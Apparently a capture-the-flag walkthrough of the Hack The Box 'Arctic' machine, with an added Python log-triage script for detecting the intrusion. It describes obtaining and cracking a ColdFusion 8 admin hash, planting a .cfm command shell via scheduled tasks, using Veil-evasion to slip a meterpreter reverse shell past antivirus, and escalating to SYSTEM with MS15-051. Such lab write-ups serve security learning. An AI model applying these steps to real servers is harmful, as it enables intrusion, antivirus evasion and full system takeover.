(HTB) Arctic Walkthrough

Name: Arctic
IP: 10.10.10.11
OS: Windows
VM Author: ch4p
Writeup Author: Teck_K2


Nmap result

First, try to find an exploit for the services running on the target machine. I looked but couldn't find any exploit for MSRPC, so we will jump to FMTP on port 8500.

We can see there are two directories; open both in new tabs.
Now open all the subdirectories, in case we find something interesting.

In the sub-directory /cfdocs I found that ColdFusion version 8 is running.

If you see an error something like this, don't worry: ColdFusion only allows 2 people at a time, and if someone didn't sign out it keeps their session open. Just reset the machine and you are good to go.

This blog may be helpful for understanding ColdFusion:
https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html

The method described in the above blog for getting the password hash didn't work for me, so I used this link from another blog to get the page.

We got the password hash. The next step described in the blog did not work for me: I couldn't get admin access, because you have only 30 seconds to submit the hash, which is very little time and needs very fast hands. I tried, but it just showed me wrong password, so I decided to crack the hash instead. First, look up the hash format using hash-identifier.

It shows that the hash is sha1(salt).
Now try to crack it using hashcat.

We cracked the password; the password is happyday.
If it shows wrong password, try at least 3-4 times; for me it worked on the 4th try.
Now we are logged in as Administrator.
Go to the DEBUGGING & LOGGING tab and click on Scheduled Tasks. A page will pop up; click on Schedule New Task.
Before creating a new task we need to create a .cfm file.
Create a new folder on the desktop and create a file cfexec.cfm in it.
Now paste the code from the blog (site) I mentioned above into that file.

Now open a terminal in that folder and start a simple HTTP server using Python.

It will start serving our file from a small web server on port 8000 so we can access it remotely.
The fields marked in yellow are the important ones to fill in; edit them and save.
We need to add the port along with our IP, or else the ColdFusion web server won't find it.
We also need to give the destination path on the ColdFusion web server; in our case it's
C:\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Now save it and you will see that ColdFusion has connected to our web server.

Now try to access our .cfm file

We can access the file
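
Seen from the defender's side, the steps above leave two traces in the web server's access log: admin-console requests from an unexpected address, and a newly served .cfm file under /CFIDE. The following is an added example, not part of the original writeup; it assumes Common Log Format, and the allowlist, baseline and sample lines are constructed placeholders.

```python
import re
from ipaddress import ip_address, ip_network

# Assumptions (hypothetical values, set per site).
ADMIN_ALLOWLIST = [ip_network("10.0.5.0/24")]        # hosts allowed to use the admin console
CFIDE_BASELINE = {"/cfide/administrator/index.cfm",  # .cfm files known to ship under /CFIDE
                  "/cfide/administrator/enter.cfm"}
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample lines in Common Log Format (not taken from the target).
SAMPLE_LOG = [
    '10.0.5.20 - - [01/Jan/2018:10:00:01 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120',
    '10.10.14.7 - - [01/Jan/2018:10:05:10 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120',
    '10.10.14.7 - - [01/Jan/2018:10:05:42 +0000] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 200 812',
    '10.10.14.7 - - [01/Jan/2018:10:09:03 +0000] "GET /CFIDE/cfexec.cfm HTTP/1.1" 200 640',
    '10.10.14.7 - - [01/Jan/2018:10:09:30 +0000] "GET /CFIDE/missing.cfm HTTP/1.1" 404 210',
    '10.0.5.20 - - [01/Jan/2018:10:10:00 +0000] "GET /index.cfm HTTP/1.1" 200 300',
]

def is_trusted(client):
    try:
        addr = ip_address(client)
    except ValueError:  # hostname or junk in the client field
        return False
    return any(addr in net for net in ADMIN_ALLOWLIST)

def triage(lines):
    """Return (reason, client, path) tuples for suspicious /CFIDE requests."""
    findings = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue
        client, _method, target, status = m.groups()
        path = target.split("?", 1)[0]
        low = path.lower()  # Windows paths are case-insensitive
        if not low.startswith("/cfide/"):
            continue
        if low.startswith("/cfide/administrator/") and not is_trusted(client):
            findings.append(("admin-console-from-untrusted-ip", client, path))
        if low.endswith(".cfm") and status == "200" and low not in CFIDE_BASELINE:
            findings.append(("unbaselined-cfm-served", client, path))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

In practice the baseline would be generated from a clean install of the same ColdFusion version rather than typed by hand.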

Now try to find the user name and extract the user flag

The output is

Now we know the user name is tolis. Try to read the flag by yourself; I am not going to show you that.

We got the flag; now try to read the Admin flag.
We don't have the privileges to access the Admin directory, so we need to escalate our privileges.

Running sysinfo shows us the configuration of the machine.

What I am going to do now is create a Windows reverse payload, upload it through the web server, and execute it to get a reverse meterpreter session, which will help us with exploitation.

Now upload it through a scheduled task and run it using our cfm shell.

Save it and click on run schedule.

We can see it has connected to our server.
Now check for the file we uploaded on the target machine, and open an msf listener in another terminal.

Using the dir command we can see the file has been uploaded to the desired location on the machine; now try to execute it.

We cannot execute the .exe file, I think because there is an antivirus installed, so we need to bypass it.
We will use veil-evasion and execute the reverse shell in .bat format.
Open veil-evasion and type list; it will show you all available payloads.
We will use 24) Powershell/meterpreter/rev_tcp
Type use 24 to select it, then set LHOST and LPORT and type generate.
When asked to name the file, type just arctic: by default veil adds .bat after the file name, so we don't need to add it.

The payload has been generated; now copy it from the veil directory to the folder we are using for the SimpleHTTPServer.

Now make a new task, upload it and run it.
In the web command field type this:

It may not work on the first go; try it 2-3 times.
Now we have the reverse shell.
We have user access only, so we need to do privilege escalation.
The system is Windows 2008 R2 build 6.1 (7600), similar to what we faced in Bastard, so we can use the MS15_051 exploit.
But we have an x86 meterpreter session and the architecture is x64; to run the post exploit successfully we need an x64 meterpreter session.

So what we can do is migrate to an x64 process.

As you can see, there is an x64 cmd.exe process which we can migrate to. Let's try.

We migrated to the cmd.exe process successfully and now have an x64 meterpreter session.
Now try to exploit it.

Before you proceed, remember to change the payload and target:
>  set payload windows/x64/meterpreter/reverse_tcp
>  set target 1
Start the exploit. If you find the reverse LHOST and LPORT are wrong, stop the exploit and set LHOST and LPORT as desired: by default, when you use a post exploit, LHOST is set to your eth0 IP address, and you need the reverse connection on your tun0 IP. Remember that you will only be able to change LHOST and LPORT after you have run it once; if you try to change the IP before running it once, it will not work. So run the exploit, check LHOST, and if it is not your tun0 IP, cancel the exploit, change LHOST and run again.
Now try to exploit.

We got NT AUTHORITY access.
Now you can read the Administrator flag.


~Enjoy Hacking and stay NOOB

